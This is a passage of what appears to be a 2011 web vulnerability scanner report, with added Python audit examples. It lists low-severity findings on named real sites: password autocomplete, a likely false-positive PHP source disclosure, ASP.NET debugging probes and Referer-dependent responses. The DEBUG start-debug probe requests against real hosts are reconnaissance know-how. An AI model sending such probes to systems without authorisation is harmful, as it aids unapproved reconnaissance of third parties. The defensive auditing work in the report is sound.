Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
<br />

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()">

<input type="hidden" name="mode" value="register_done" />
...[SNIP]...
<td><input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value=""></td>
...[SNIP]...
<td><input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value=""></td>
...[SNIP]...

15.10. http://www.sacbee.com/reg-bin/int.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

/reg-bin/int.cgi

The form contains the following password field with autocomplete enabled:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:27:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:27:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new
...[SNIP]...
</h3>
<form id="LoginForm" name="LoginForm" action="/reg-bin/int.cgi" method="post">
<input type="hidden" name="mode" value="login_done" />
...[SNIP]...
</label>
<input type="password" name="password" id="password" value="" size="25" class="miregtext">
<input type="image" id="signin-button" src="/static/images/signin-button.png" value="Sign In" />
...[SNIP]...

15.11. https://www.sprint.net/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The page contains a form with the following action URL:

/login

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<div style="margin-top: 0; border-top: 1px solid #C1C1C1; padding: 5px 0px 0px 15px;">
<form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
<input type="hidden" name="z" value="" />
...[SNIP]...
</p>
<input name="pass" type="password" size="20" />
<input style="margin-top: 10px;" name="signin" type="image" value="login" src="/images/signin.jpg" alt="sign in" />
...[SNIP]...

15.12. https://www.sprint.net/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Issue detail

The page contains a form with the following action URL:

/login

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<div id="login_form" class="ui-corner-all">
                       <form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
                   <input name="z" value="" type="hidden">
...[SNIP]...
</p>
               <input name="pass" size="20" type="password">

                   <div>
...[SNIP]...

15.13. https://www.sprint.net/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /index.php

Issue detail

The page contains a form with the following action URL:

/login

The form contains the following password field with autocomplete enabled:

pass

Request

GET /index.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:27:57 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 16851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<div id="login_form" class="ui-corner-all">
                       <form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
                   <input name="z" value="" type="hidden">
...[SNIP]...
</p>
               <input name="pass" size="20" type="password">

                   <div>
...[SNIP]...

15.14. https://www.sprint.net/index.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /index.php

Issue detail

The page contains a form with the following action URL:

/login

The form contains the following password field with autocomplete enabled:

pass

Request

GET /index.php HTTP/1.1
Host: www.sprint.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:27:57 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 16851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>
   
...[SNIP]...
<div style="margin-top: 0; border-top: 1px solid #C1C1C1; padding: 5px 0px 0px 15px;">
<form style="margin-top: 2px;" method="post" action="/login" enctype="application/x-www-form-urlencoded" name="login">
<input type="hidden" name="z" value="" />
...[SNIP]...
</p>
<input name="pass" type="password" size="20" />
<input style="margin-top: 10px;" name="signin" type="image" value="login" src="/images/signin.jpg" alt="sign in" />
...[SNIP]...

15.15. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

/reg-bin/int.cgi

The form contains the following password field with autocomplete enabled:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
</h3>
<form name="LoginForm" action="/reg-bin/int.cgi" method=post>
<input type="hidden" name="mode" value="login_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregtext" value="">
<p class="form-notif">
...[SNIP]...

15.16. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

/reg-bin/int.cgi

The form contains the following password field with autocomplete enabled:

password

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
<div class="login-form">
<form method="post" action="/reg-bin/int.cgi">
<input type="hidden" value="login_done" name="mode"/>
...[SNIP]...
</label>
<input type="password" class="text" name="password" />
<!-- /.form_input -->
...[SNIP]...

15.17. http://www.thatsracin.com/reg-bin/int.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thatsracin.com
Path:   /reg-bin/int.cgi

Issue detail

The page contains a form with the following action URL:

/reg-bin/int.cgi

The form contains the following password fields with autocomplete enabled:

password
pwconfirm

Request

GET /reg-bin/int.cgi HTTP/1.1
Host: www.thatsracin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds020p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 04 Sep 2011 01:28:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:28:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>


<head>


<title></title>


        <meta http-equiv="Content-Type" content="
...[SNIP]...
</script>

<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()" id="registration">
<input type="hidden" name="mode" value="register_done">
...[SNIP]...
</label>
<input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value="">
</div>
...[SNIP]...
</label>
<input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value="">
</div>
...[SNIP]...
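The check behind findings 15.7 to 15.17, as an added example that is not part of the XSS.CX / Burp report: walk the HTML, record every password input together with the action of its enclosing form, and flag it unless the input or the form carries autocomplete="off". The sample markup is constructed from the form fragments the report quotes (LinkedIn in 15.7, the sacbee registration form in 15.9) and abbreviated; using html.parser for this is our choice.

```python
# Added example (not part of the report): password-field autocomplete audit
# over HTML constructed from the form fragments quoted in findings 15.7 and 15.9.
from html.parser import HTMLParser


class PasswordFieldAudit(HTMLParser):
    """Record every <input type="password"> with the action of its enclosing
    <form> and whether autocomplete is still enabled for it."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._form = None  # (action, form-level autocomplete) while inside a form

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}  # html.parser lowercases names
        if tag == "form":
            self._form = (a.get("action", ""), a.get("autocomplete", "").lower())
        elif tag == "input" and a.get("type", "").lower() == "password":
            action, form_ac = self._form or ("", "")
            field_ac = a.get("autocomplete", "").lower()
            self.findings.append({
                "action": action,
                "name": a.get("name", ""),
                # autocomplete is on unless the input or its form turns it off
                "autocomplete_enabled": field_ac != "off" and form_ac != "off",
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def audit_password_fields(html):
    parser = PasswordFieldAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed from finding 15.7 (LinkedIn): one password field, no autocomplete attribute.
LINKEDIN_FORM = """
<form action="/secure/login" method="POST" accept-charset="UTF-8" name="login">
<input type="password" name="session_password" value="" id="session_password-login" tabindex="2">
</form>
"""

# Constructed from finding 15.9 (sacbee registration): two password fields.
SACBEE_REGISTRATION = """
<form name="registration" method="post" action="/reg-bin/int.cgi" onSubmit="return validate()">
<input type="hidden" name="mode" value="register_done" />
<td><input type="password" name="password" class="miregpassword" id="miregpasswordpassword" value=""></td>
<td><input type="password" name="pwconfirm" class="miregpassword" id="miregpasswordpwconfirm" value=""></td>
</form>
"""

# The LinkedIn form with the attribute the finding asks for (constructed).
FIXED_FORM = """
<form action="/secure/login" method="POST" name="login" autocomplete="off">
<input type="password" name="session_password" autocomplete="off">
</form>
"""

if __name__ == "__main__":
    for label, html in [("linkedin", LINKEDIN_FORM), ("sacbee", SACBEE_REGISTRATION), ("fixed", FIXED_FORM)]:
        for finding in audit_password_fields(html):
            print(label, finding)
```

One caveat the report does not state: current browsers generally ignore autocomplete="off" on login password fields and still offer to save and fill the credential, so the attribute is defence in depth at best, which is consistent with the Low severity given to every instance above.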

16. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://platform.linkedin.com
Path:   /js/nonSecureAnonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP. Note, however, that the response body quoted below is JavaScript that uses "<?js" and "?>" as template delimiters ("Template markers must be set."), which is exactly what a PHP-tag pattern matches on. That is consistent with the Tentative confidence and is most likely a false positive; confirm by hand before treating it as a disclosure.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /js/nonSecureAnonymousFramework?v=0.0.1132-RC5.9322-1337 HTTP/1.1
Host: platform.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 00:45:49 GMT
Expires: Sun, 11 Sep 2011 00:45:49 GMT
Last-Modified: Sat, 03 Sep 2011 04:25:33 GMT
Server: ECS (sjo/5235)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 144326

(function(){
var l,
doAuth,
h = [],
valid = false,
a = "",
fwk = "http://platform.linkedin.com/js/framework?v=0.0.1132-RC5.9322-1337",
xtnreg = /extensions=([^&]*)&?/,
xtn
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...
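As an added example that is not from the report, here is a PHP-source-disclosure heuristic of the kind behind finding 16, together with the "<?js ?>" case that makes the LinkedIn response a likely false positive. The heuristic is ours, not Burp's implementation; the sample bodies are constructed, the first one modelled on the JavaScript fragment quoted above, and the "leak" body is an illustration with no real host or code behind it.

```python
# Added example (not from the report): PHP-tag heuristic with handling for
# template delimiters and XML declarations that are not PHP.
import re

# Naive: anything between "<?" and "?>" counts as PHP.
NAIVE_PHP = re.compile(r"<\?.*?\?>", re.S)

# Opening markers that are definitely not PHP: XML declarations and the
# "<?js" template delimiter used by the JavaScript quoted in finding 16.
NOT_PHP_OPEN = re.compile(r"<\?(?:xml|js)\b")

# A real PHP opening tag, or the echo short form "<?=".
PHP_OPEN = re.compile(r"<\?(?:php\b|=)")

# A bare short tag "<? " is only weak evidence (short_open_tag is optional).
PHP_SHORT_OPEN = re.compile(r"<\?\s")


def naive_php_disclosure(body):
    return bool(NAIVE_PHP.search(body))


def classify_php_disclosure(body):
    """Return "certain", "tentative" or None, mirroring the report's
    confidence levels: known non-PHP markers are removed first so that a
    template delimiter cannot masquerade as a PHP tag."""
    cleaned = NOT_PHP_OPEN.sub("", body)
    if PHP_OPEN.search(cleaned):
        return "certain"
    if PHP_SHORT_OPEN.search(cleaned):
        return "tentative"
    return None


# Constructed, modelled on the LinkedIn framework JavaScript quoted in finding 16.
JS_TEMPLATE_BODY = '''var l = "<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")}'''

# Constructed illustration of what a genuine disclosure looks like.
PHP_LEAK_BODY = '''<?php
$conn = mysqli_connect("dbhost", "appuser", "example-password");
?>'''

XML_BODY = '<?xml version="1.0"?><root/>'

SHORT_TAG_BODY = '<? echo $greeting; ?>'

if __name__ == "__main__":
    for name, body in [("js template", JS_TEMPLATE_BODY), ("php leak", PHP_LEAK_BODY),
                       ("xml", XML_BODY), ("short tag", SHORT_TAG_BODY)]:
        print(f"{name:12} naive={naive_php_disclosure(body)!s:5} strict={classify_php_disclosure(body)}")
```

The naive pattern fires on the JavaScript template and on any XML declaration; the stricter classifier reports the constructed PHP body as certain, the bare short tag as tentative, and the LinkedIn-style template as nothing at all.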

17. ASP.NET debugging enabled
There are 4 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file, so confirm that the debug attribute of the <compilation> element has not been set to "true" in Machine.config as well.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.
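Two checks a practitioner would want alongside the four instances below, as an added example that is not part of the report: interpret the answer to the DEBUG / start-debug probe the instances show, and audit a Web.config or Machine.config for the <compilation debug="true"> setting the remediation refers to. The 401 body is the one quoted in 17.1 to 17.4; that an accepted start-debug answers 200 with the body "OK" is general ASP.NET knowledge and is an assumption here; the XML fragments and the 404 response are constructed.

```python
# Added example (not from the report): DEBUG-verb probe classification and
# Web.config / Machine.config audit for ASP.NET debugging.
import xml.etree.ElementTree as ET


def debug_probe_request(host, path="/Default.aspx"):
    """The exact request the report sends in 17.1 to 17.4."""
    return f"DEBUG {path} HTTP/1.0\r\nHost: {host}\r\nCommand: start-debug\r\n\r\n"


def parse_response(raw):
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])  # "HTTP/1.1 401 Unauthorized" -> 401
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers, body.strip()


def classify_debug_probe(raw):
    status, headers, body = parse_response(raw)
    if status == 200 and body == "OK":  # assumption: ASP.NET acknowledges with "OK"
        return "debug enabled, start-debug accepted"
    if status == 401 and "debug access denied" in body.lower():
        # Debugging is on; only platform authentication stands in the way.
        schemes = [v.split()[0] for v in headers.get("www-authenticate", [])]
        return "debug enabled, platform auth required: " + ", ".join(schemes)
    return "no evidence of debugging"


def compilation_debug_enabled(config_xml):
    """True if any <compilation> element in the config has debug="true".
    iter() is used rather than a fixed path because the element can sit
    under <system.web> directly or inside a <location> wrapper."""
    root = ET.fromstring(config_xml)
    return any(el.get("debug", "").lower() == "true" for el in root.iter("compilation"))


# Transcribed from finding 17.1 (headers abbreviated).
PROBE_AUTH_REQUIRED = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "WWW-Authenticate: Negotiate\r\n"
    "WWW-Authenticate: NTLM\r\n"
    "X-AspNet-Version: 2.0.50727\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Content-Length: 39\r\n"
    "\r\n"
    "Debug access denied to '/Default.aspx'."
)
# Constructed: what an accepted start-debug is assumed to look like.
PROBE_ACCEPTED = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\nOK"
# Constructed: a server that does not treat the verb as a debug request.
PROBE_NONE = "HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"

# Constructed configuration fragments: the weak setting and the corrected one.
WEB_CONFIG_DEBUG = """<configuration>
  <system.web>
    <compilation debug="true" />
  </system.web>
</configuration>"""
WEB_CONFIG_FIXED = WEB_CONFIG_DEBUG.replace('debug="true"', 'debug="false"')

if __name__ == "__main__":
    print(debug_probe_request("my.textcaster.com"), end="")
    for raw in (PROBE_AUTH_REQUIRED, PROBE_ACCEPTED, PROBE_NONE):
        print(classify_debug_probe(raw))
    print("Web.config debug:", compilation_debug_enabled(WEB_CONFIG_DEBUG))
    print("fixed Web.config debug:", compilation_debug_enabled(WEB_CONFIG_FIXED))
```

A 401 carrying "Debug access denied" is the fingerprint of debug="true" behind the default access control, which is why the report rates it Information but still records the authentication schemes offered (Negotiate/NTLM, or Basic in 17.3). After the remediation the probe should fall into the last branch, and the config audit should return False for both Web.config and Machine.config.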



17.1. http://my.textcaster.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://my.textcaster.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: my.textcaster.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 01:24:29 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

17.2. http://stockscreener.us.reuters.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stockscreener.us.reuters.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: stockscreener.us.reuters.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Connection: close
Date: Sun, 04 Sep 2011 01:24:20 GMT
Content-Length: 39
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727

Debug access denied to '/Default.aspx'.

17.3. http://usata1.gcion.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://usata1.gcion.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: usata1.gcion.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Sun, 04 Sep 2011 00:42:44 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="usata1.gcion.com"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

17.4. http://www.wisdomtree.com/Default.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wisdomtree.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.wisdomtree.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 01:29:25 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18. Referer-dependent response
There are 4 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

- access controls that trust the Referer header;
- cross-site request forgery defences that rely on the Referer header;
- response content that is tailored to the referring page.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



18.1. http://c.brightcove.com/services/viewer/federated_f9

Summary

Severity:   Information
Confidence:   Firm
Host:   http://c.brightcove.com
Path:   /services/viewer/federated_f9

Request 1

GET /services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/players/charlotteobservergeneric.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 13:30:12 EDT
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?playerID=1055201224001&purl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&allowScriptAccess=always&autoStart=false&bgcolor=%23F4F4F4&debuggerID=&dynamicStreaming=true&flashID=myExperience&height=500&isUI=true&isVid=true&publisherID=315980433&videoSmoothing=true&width=300&wmode=opaque
Content-Length: 0
Date: Sun, 04 Sep 2011 01:06:08 GMT
Server:

Request 2

GET /services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID= HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Sat, 27 Aug 2011 17:30:12 UTC
Cache-Control: must-revalidate,max-age=0
Location: http://admin.brightcove.com/viewer/us20110826.2108/BrightcoveBootloader.swf?playerID=1055201224001&allowScriptAccess=always&autoStart=false&bgcolor=%23F4F4F4&debuggerID=&dynamicStreaming=true&flashID=myExperience&height=500&isUI=true&isVid=true&publisherID=315980433&videoSmoothing=true&width=300&wmode=opaque
Content-Length: 0
Date: Sun, 04 Sep 2011 01:06:49 GMT
Server:
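To see what in 18.1 actually depends on the Referer, here is an added example (not from the report) that compares the two Brightcove responses after discarding the headers that differ between any two requests anyway, and then diffs the query strings of the two Location headers. The two responses are transcribed from the report; which headers count as volatile is our choice.

```python
# Added example (not from the report): normalised diff of the two responses
# in finding 18.1, isolating the Referer-dependent part.
from urllib.parse import parse_qs, urlsplit

VOLATILE_HEADERS = {"date", "last-modified", "x-bc-client-ip", "x-bc-connecting-ip"}

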